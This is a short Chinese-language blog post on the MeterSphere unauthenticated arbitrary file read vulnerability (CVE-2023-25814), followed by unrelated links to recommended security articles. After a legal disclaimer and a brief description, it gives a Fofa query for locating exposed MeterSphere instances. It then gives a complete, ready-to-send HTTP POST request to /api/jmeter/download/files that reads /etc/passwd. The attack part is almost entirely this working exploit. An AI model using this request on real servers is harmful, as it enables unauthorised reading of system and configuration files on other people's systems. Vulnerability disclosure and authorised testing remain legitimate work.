MeterSphere 任意文件读取漏洞(CVE-2023-25814)

MeterSphere 任意文件读取漏洞(CVE-2023-25814)

免责声明

仅用于技术交流,目的是向相关安全人员展示漏洞利用方式,以便更好地提高网络安全意识和技术水平。

任何人不得利用该文章进行非法攻击和侵犯他人的隐私和财产权利。一旦发生任何违法行为,责任自负。

该文章仅用于授权测试,任何未经授权的测试均属于非法行为。请在法律许可范围内使用。

作者对使用该文章导致的任何直接或间接损失不承担任何责任。使用此文章的风险由使用者自行承担。

漏洞描述

MeterSphere 是一站式开源持续测试平台, 涵盖测试跟踪、接口测试、UI 测试和性能测试等功能,全面兼容 JMeter、Selenium 等主流开源标准。MeterSphere存在未授权任意文件读取漏洞。

漏洞影响

MeterSphere

漏洞危害

未经允许的攻击者可通过该漏洞读取服务器配置信息,敏感文件等。

网络测绘

Fofa: title="MeterSphere"


漏洞复现

1. 构造poc

vbnet 复制代码
POST /api/jmeter/download/files HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip
Connection: close
Content-Type: application/json
Content-Length: 0

{"reportId":"pass","bodyFiles":[{"id":"aaa","name":"/etc/passwd"}]}

2. 发送数据包

发送后会自动下载一个压缩包,里面的内容就是我们读取的文件内容

3. 查看文件

相关推荐
Micro麦可乐20 小时前
最新Spring Security实战教程(十八)安全日志与审计:关键操作追踪与风险预警
java·spring boot·后端·安全·spring·安全审计
galaxylove20 小时前
Gartner发布新的网络安全运营模型:决定安全运营的9个组件
网络·安全·web安全
HhhDreamof_20 小时前
安全生产台账系统
安全
90wunch21 小时前
更进一步深入的研究ObRegisterCallBack
c++·windows·安全
midsummer_woo1 天前
windows系统安全加固
windows·安全·系统安全
mCell2 天前
你可能在用错密码:服务端密码安全的真相与陷阱
后端·安全·go
全干engineer2 天前
web3-区块链的技术安全/经济安全以及去杠杆螺旋(经济稳定)
安全·web3·去中心化·区块链·智能合约
海尔辛2 天前
防御性安全:数字取证
数据库·安全·数字取证
智能相对论2 天前
当雷达学会“读心术” 汽车舱内安全迈入新纪元
安全·汽车
上海云盾第一敬业销售2 天前
高防IP是怎么防御的?高防IP的防御步骤又有哪些?
运维·网络·安全